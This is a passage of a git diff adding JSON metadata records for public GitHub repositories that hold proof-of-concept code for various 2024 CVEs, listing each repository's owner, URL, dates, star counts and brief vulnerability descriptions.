[], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41107.json b/2024/CVE-2024-41107.json new file mode 100644 index 0000000000..5696a35c76 --- /dev/null +++ b/2024/CVE-2024-41107.json @@ -0,0 +1,33 @@ +[ + { + "id": 832571304, + "name": "CVE-2024-41107", + "full_name": "d0rb\/CVE-2024-41107", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-41107", + "description": "This repository contains an PoC for the critical vulnerability identified as CVE-2024-41107 in Apache CloudStack", + "fork": false, + "created_at": "2024-07-23T09:39:42Z", + "updated_at": "2024-11-20T16:30:58Z", + "pushed_at": "2024-07-25T13:06:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41110.json b/2024/CVE-2024-41110.json new file mode 100644 index 0000000000..25f1ad995a --- /dev/null +++ b/2024/CVE-2024-41110.json @@ -0,0 +1,64 @@ +[ + { + "id": 833515840, + "name": "cve-2024-41110-checker", + "full_name": "vvpoglazov\/cve-2024-41110-checker", + "owner": { + "login": "vvpoglazov", + "id": 123960062, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123960062?v=4", + "html_url": "https:\/\/github.com\/vvpoglazov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vvpoglazov\/cve-2024-41110-checker", + "description": null, + "fork": false, + "created_at": "2024-07-25T08:03:15Z", + "updated_at": "2024-10-03T12:52:43Z", + "pushed_at": "2024-07-25T09:34:33Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834245223, + "name": "CVE-2024-41110-SCAN", + "full_name": "PauloParoPP\/CVE-2024-41110-SCAN", + "owner": { + "login": "PauloParoPP", + "id": 51863323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51863323?v=4", + "html_url": "https:\/\/github.com\/PauloParoPP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PauloParoPP\/CVE-2024-41110-SCAN", + "description": null, + "fork": false, + "created_at": "2024-07-26T18:41:42Z", + "updated_at": "2024-07-26T19:21:26Z", + "pushed_at": "2024-07-26T19:21:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41276.json b/2024/CVE-2024-41276.json new file mode 100644 index 0000000000..be6b880a0d --- /dev/null +++ b/2024/CVE-2024-41276.json @@ -0,0 +1,33 @@ +[ + { + "id": 825691437, + "name": "CVE-2024-41276", + "full_name": "artemy-ccrsky\/CVE-2024-41276", + "owner": { + "login": "artemy-ccrsky", + "id": 33719402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33719402?v=4", + "html_url": "https:\/\/github.com\/artemy-ccrsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/artemy-ccrsky\/CVE-2024-41276", + "description": null, + "fork": false, + "created_at": "2024-07-08T10:21:34Z", + "updated_at": "2024-10-14T08:29:06Z", + "pushed_at": "2024-07-31T19:24:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41290.json b/2024/CVE-2024-41290.json new file mode 100644 index 0000000000..5df5428d48 --- /dev/null +++ b/2024/CVE-2024-41290.json @@ -0,0 +1,33 @@ +[ + { + "id": 866035036, + "name": "CVE-2024-41290", + "full_name": "paragbagul111\/CVE-2024-41290", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-41290", + "description": "FlatPress CMS v1.3.1 1.3 was discovered to use insecure methods to > store authentication data", + "fork": false, + "created_at": "2024-10-01T14:35:39Z", + "updated_at": "2024-10-01T14:40:00Z", + "pushed_at": "2024-10-01T14:39:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41301.json b/2024/CVE-2024-41301.json new file mode 100644 index 0000000000..4fb66e1996 --- /dev/null +++ b/2024/CVE-2024-41301.json @@ -0,0 +1,33 @@ +[ + { + "id": 828534593, + "name": "CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting", + "full_name": "patrickdeanramos\/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting", + "owner": { + "login": "patrickdeanramos", + "id": 17971824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17971824?v=4", + "html_url": "https:\/\/github.com\/patrickdeanramos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickdeanramos\/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting", + "description": null, + "fork": false, + "created_at": "2024-07-14T12:51:17Z", + "updated_at": "2024-07-30T22:51:54Z", + "pushed_at": "2024-07-30T22:51:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41302.json b/2024/CVE-2024-41302.json new file mode 100644 index 0000000000..2956912c18 --- /dev/null +++ b/2024/CVE-2024-41302.json @@ -0,0 +1,33 @@ +[ + { + "id": 828537636, + "name": "CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection", + "full_name": "patrickdeanramos\/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection", + "owner": { + "login": "patrickdeanramos", + "id": 17971824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17971824?v=4", + "html_url": "https:\/\/github.com\/patrickdeanramos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickdeanramos\/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection", + "description": "Bookea-tu-Mesa is vulnerable to SQL Injection", + "fork": false, + "created_at": "2024-07-14T13:01:36Z", + "updated_at": "2024-07-30T22:53:28Z", + "pushed_at": "2024-07-30T22:53:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41312.json b/2024/CVE-2024-41312.json new file mode 100644 index 0000000000..f9dc7f8849 --- /dev/null +++ b/2024/CVE-2024-41312.json @@ -0,0 +1,33 @@ +[ + { + "id": 847583819, + "name": "CVE-2024-41312.", + "full_name": "Amal264882\/CVE-2024-41312.", + "owner": { + "login": "Amal264882", + "id": 27804408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27804408?v=4", + "html_url": "https:\/\/github.com\/Amal264882", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amal264882\/CVE-2024-41312.", + "description": "InstantCMS - Stored Cross Site Scripting (XSS)", + "fork": false, + "created_at": "2024-08-26T06:32:49Z", + "updated_at": "2024-08-26T06:45:26Z", + "pushed_at": "2024-08-26T06:45:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41570.json b/2024/CVE-2024-41570.json new file mode 100644 index 0000000000..ab75c36f1d --- /dev/null +++ b/2024/CVE-2024-41570.json @@ -0,0 +1,33 @@ +[ + { + "id": 828329292, + "name": "Havoc-C2-SSRF-poc", + "full_name": "chebuya\/Havoc-C2-SSRF-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/Havoc-C2-SSRF-poc", + "description": "CVE-2024-41570: Havoc C2 0.7 Teamserver SSRF exploit", + "fork": false, + "created_at": "2024-07-13T19:54:27Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-09-11T20:00:46Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41628.json b/2024/CVE-2024-41628.json new file mode 100644 index 0000000000..ba2d4fecd8 --- /dev/null +++ b/2024/CVE-2024-41628.json @@ -0,0 +1,33 @@ +[ + { + "id": 835107342, + "name": "CVE-2024-41628", + "full_name": "Redshift-CyberSecurity\/CVE-2024-41628", + "owner": { + "login": "Redshift-CyberSecurity", + "id": 64486752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64486752?v=4", + "html_url": "https:\/\/github.com\/Redshift-CyberSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redshift-CyberSecurity\/CVE-2024-41628", + "description": null, + "fork": false, + "created_at": "2024-07-29T07:12:14Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-07-29T13:04:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41640.json b/2024/CVE-2024-41640.json new file mode 100644 index 0000000000..c158568e89 --- /dev/null +++ b/2024/CVE-2024-41640.json @@ -0,0 +1,33 @@ +[ + { + "id": 829873539, + "name": "CVE-2024-41640", + "full_name": "alemusix\/CVE-2024-41640", + "owner": { + "login": "alemusix", + "id": 15678800, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15678800?v=4", + "html_url": "https:\/\/github.com\/alemusix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alemusix\/CVE-2024-41640", + "description": null, + "fork": false, + "created_at": "2024-07-17T07:00:31Z", + "updated_at": "2024-07-27T09:41:00Z", + "pushed_at": "2024-07-17T07:57:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41651.json b/2024/CVE-2024-41651.json new file mode 100644 index 0000000000..826d8ced2b --- /dev/null +++ b/2024/CVE-2024-41651.json @@ -0,0 +1,33 @@ +[ + { + "id": 839965855, + "name": "CVE-2024-41651", + "full_name": "Fckroun\/CVE-2024-41651", + "owner": { + "login": "Fckroun", + "id": 69816382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69816382?v=4", + "html_url": "https:\/\/github.com\/Fckroun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fckroun\/CVE-2024-41651", + "description": "CVE-2024-41651", + "fork": false, + "created_at": "2024-08-08T17:25:30Z", + "updated_at": "2024-08-08T17:26:30Z", + "pushed_at": "2024-08-08T17:26:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41662.json b/2024/CVE-2024-41662.json new file mode 100644 index 0000000000..2a726cef35 --- /dev/null +++ b/2024/CVE-2024-41662.json @@ -0,0 +1,33 @@ +[ + { + "id": 832765785, + "name": "CVE-2024-41662", + "full_name": "sh3bu\/CVE-2024-41662", + "owner": { + "login": "sh3bu", + "id": 67383098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67383098?v=4", + "html_url": "https:\/\/github.com\/sh3bu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sh3bu\/CVE-2024-41662", + "description": "Markdown XSS leads to RCE in VNote version <=3.18.1", + "fork": false, + "created_at": "2024-07-23T17:21:12Z", + "updated_at": "2024-07-24T18:39:25Z", + "pushed_at": "2024-07-24T18:39:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41958.json b/2024/CVE-2024-41958.json new file mode 100644 index 0000000000..c0b5863e4a --- /dev/null +++ b/2024/CVE-2024-41958.json @@ -0,0 +1,33 @@ +[ + { + "id": 838500653, + "name": "CVE-2024-41958-PoC", + "full_name": "OrangeJuiceHU\/CVE-2024-41958-PoC", + "owner": { + "login": "OrangeJuiceHU", + "id": 30298257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30298257?v=4", + "html_url": "https:\/\/github.com\/OrangeJuiceHU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OrangeJuiceHU\/CVE-2024-41958-PoC", + "description": "This is a small proof of concept for CVE-2024-41958", + "fork": false, + "created_at": "2024-08-05T19:10:08Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-05T20:22:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41992.json b/2024/CVE-2024-41992.json new file mode 100644 index 0000000000..d492594255 --- /dev/null +++ b/2024/CVE-2024-41992.json @@ -0,0 +1,33 @@ +[ + { + "id": 846775020, + "name": "CVE-2024-41992-PoC", + "full_name": "fj016\/CVE-2024-41992-PoC", + "owner": { + "login": "fj016", + "id": 117085317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117085317?v=4", + "html_url": "https:\/\/github.com\/fj016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fj016\/CVE-2024-41992-PoC", + "description": "PoC for the CVE-2024-41992 (RCE on devices running WiFi-TestSuite-DUT)", + "fork": false, + "created_at": "2024-08-23T23:48:01Z", + "updated_at": "2024-10-31T08:55:01Z", + "pushed_at": "2024-08-26T07:09:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4231.json b/2024/CVE-2024-4231.json new file mode 100644 index 0000000000..8396a75b2b --- /dev/null +++ b/2024/CVE-2024-4231.json @@ -0,0 +1,33 @@ +[ + { + "id": 816778703, + "name": "Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231", + "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231", + "description": null, + "fork": false, + "created_at": "2024-06-18T11:43:23Z", + "updated_at": "2024-06-18T11:43:27Z", + "pushed_at": "2024-06-18T11:43:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4232.json b/2024/CVE-2024-4232.json new file mode 100644 index 0000000000..60fba1863f --- /dev/null +++ b/2024/CVE-2024-4232.json @@ -0,0 +1,64 @@ +[ + { + "id": 816762824, + "name": "Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232", + "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232", + "description": null, + "fork": false, + "created_at": "2024-06-18T11:05:06Z", + "updated_at": "2024-06-18T11:05:10Z", + "pushed_at": "2024-06-18T11:05:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823986903, + "name": "Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232", + "full_name": "Redfox-Secuirty\/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232", + "description": null, + "fork": false, + "created_at": "2024-07-04T06:30:19Z", + "updated_at": "2024-07-04T06:30:22Z", + "pushed_at": "2024-07-04T06:30:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42346.json b/2024/CVE-2024-42346.json new file mode 100644 index 0000000000..58a72dab92 --- /dev/null +++ b/2024/CVE-2024-42346.json @@ -0,0 +1,33 @@ +[ + { + "id": 890535432, + "name": "CVE-2024-42346", + "full_name": "partywavesec\/CVE-2024-42346", + "owner": { + "login": "partywavesec", + "id": 98420665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98420665?v=4", + "html_url": "https:\/\/github.com\/partywavesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/partywavesec\/CVE-2024-42346", + "description": "CVE-2024-42346 POC", + "fork": false, + "created_at": "2024-11-18T18:31:03Z", + "updated_at": "2024-11-24T07:52:02Z", + "pushed_at": "2024-11-18T18:32:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42461.json b/2024/CVE-2024-42461.json new file mode 100644 index 0000000000..6a5e10cab5 --- /dev/null +++ b/2024/CVE-2024-42461.json @@ -0,0 +1,33 @@ +[ + { + "id": 839055208, + "name": "CVE-2024-42461", + "full_name": "fevar54\/CVE-2024-42461", + "owner": { + "login": "fevar54", + "id": 80516843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80516843?v=4", + "html_url": "https:\/\/github.com\/fevar54", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fevar54\/CVE-2024-42461", + "description": "Se han identificado problemas en la verificación de firmas ECDSA y EDDSA en el proyecto Wycheproof. Las comprobaciones ausentes durante la etapa de decodificación de firmas permiten agregar o eliminar bytes cero, lo que afecta la capacidad de envío de correos. ", + "fork": false, + "created_at": "2024-08-06T21:56:15Z", + "updated_at": "2024-08-06T22:19:23Z", + "pushed_at": "2024-08-06T22:19:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42640.json b/2024/CVE-2024-42640.json new file mode 100644 index 0000000000..a096475c21 --- /dev/null +++ b/2024/CVE-2024-42640.json @@ -0,0 +1,69 @@ +[ + { + "id": 870154624, + "name": "CVE-2024-42640", + "full_name": "rvizx\/CVE-2024-42640", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2024-42640", + "description": "Unauthenticated Remote Code Execution via Angular-Base64-Upload Library ", + "fork": false, + "created_at": "2024-10-09T14:35:06Z", + "updated_at": "2024-11-26T15:16:00Z", + "pushed_at": "2024-10-18T15:10:13Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "angular-base64-upload", + "cve-2024-42640", + "exploit", + "poc-exploit" + ], + "visibility": "public", + "forks": 15, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891216922, + "name": "CVE-2024-42640", + "full_name": "KTN1990\/CVE-2024-42640", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2024-42640", + "description": "Unauthenticated Remote Code Execution via Angular-Base64-Upload Library (npm:bower)", + "fork": false, + "created_at": "2024-11-19T23:54:30Z", + "updated_at": "2024-11-21T03:18:25Z", + "pushed_at": "2024-11-20T22:15:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42642.json b/2024/CVE-2024-42642.json new file mode 100644 index 0000000000..d8e6b476aa --- /dev/null +++ b/2024/CVE-2024-42642.json @@ -0,0 +1,33 @@ +[ + { + "id": 850005996, + "name": "CVE-2024-42642", + "full_name": "VL4DR\/CVE-2024-42642", + "owner": { + "login": "VL4DR", + "id": 96614714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96614714?v=4", + "html_url": "https:\/\/github.com\/VL4DR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VL4DR\/CVE-2024-42642", + "description": null, + "fork": false, + "created_at": "2024-08-30T17:24:58Z", + "updated_at": "2024-11-14T00:25:35Z", + "pushed_at": "2024-09-19T22:32:33Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42657.json b/2024/CVE-2024-42657.json new file mode 100644 index 0000000000..ee1114de25 --- /dev/null +++ b/2024/CVE-2024-42657.json @@ -0,0 +1,33 @@ +[ + { + "id": 843654614, + "name": "CVE-2024-42657", + "full_name": "sudo-subho\/CVE-2024-42657", + "owner": { + "login": "sudo-subho", + "id": 77957540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77957540?v=4", + "html_url": "https:\/\/github.com\/sudo-subho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudo-subho\/CVE-2024-42657", + "description": "CVE-2024-42657 An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the lack of encryption during login process.", + "fork": false, + "created_at": "2024-08-17T02:55:14Z", + "updated_at": "2024-08-17T02:59:43Z", + "pushed_at": "2024-08-17T02:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42658.json b/2024/CVE-2024-42658.json new file mode 100644 index 0000000000..3bf93b012f --- /dev/null +++ b/2024/CVE-2024-42658.json @@ -0,0 +1,33 @@ +[ + { + "id": 843655957, + "name": "CVE-2024-42658", + "full_name": "sudo-subho\/CVE-2024-42658", + "owner": { + "login": "sudo-subho", + "id": 77957540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77957540?v=4", + "html_url": "https:\/\/github.com\/sudo-subho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudo-subho\/CVE-2024-42658", + "description": " CVE-2024-42658 An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the cookies parameter", + "fork": false, + "created_at": "2024-08-17T03:02:20Z", + "updated_at": "2024-08-17T03:03:41Z", + "pushed_at": "2024-08-17T03:03:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42758.json b/2024/CVE-2024-42758.json new file mode 100644 index 0000000000..9ceb60d8b9 --- /dev/null +++ b/2024/CVE-2024-42758.json @@ -0,0 +1,33 @@ +[ + { + "id": 842971544, + "name": "CVE-2024-42758", + "full_name": "1s1ldur\/CVE-2024-42758", + "owner": { + "login": "1s1ldur", + "id": 124069385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124069385?v=4", + "html_url": "https:\/\/github.com\/1s1ldur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1s1ldur\/CVE-2024-42758", + "description": "CVE-2024-42758 - Dokuwiki (indexmenu plugin) - XSS Vulnerability", + "fork": false, + "created_at": "2024-08-15T13:59:50Z", + "updated_at": "2024-08-16T14:07:41Z", + "pushed_at": "2024-08-15T19:33:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-42834.json b/2024/CVE-2024-42834.json new file mode 100644 index 0000000000..e8600b9bdb --- /dev/null +++ b/2024/CVE-2024-42834.json @@ -0,0 +1,33 @@ +[ + { + "id": 846804238, + "name": "CVE-2024-42834", + "full_name": "CyberSec-Supra\/CVE-2024-42834", + "owner": { + "login": "CyberSec-Supra", + "id": 179279546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179279546?v=4", + "html_url": "https:\/\/github.com\/CyberSec-Supra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberSec-Supra\/CVE-2024-42834", + "description": null, + "fork": false, + "created_at": "2024-08-24T02:21:33Z", + "updated_at": "2024-08-24T02:26:10Z", + "pushed_at": "2024-08-24T02:26:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git 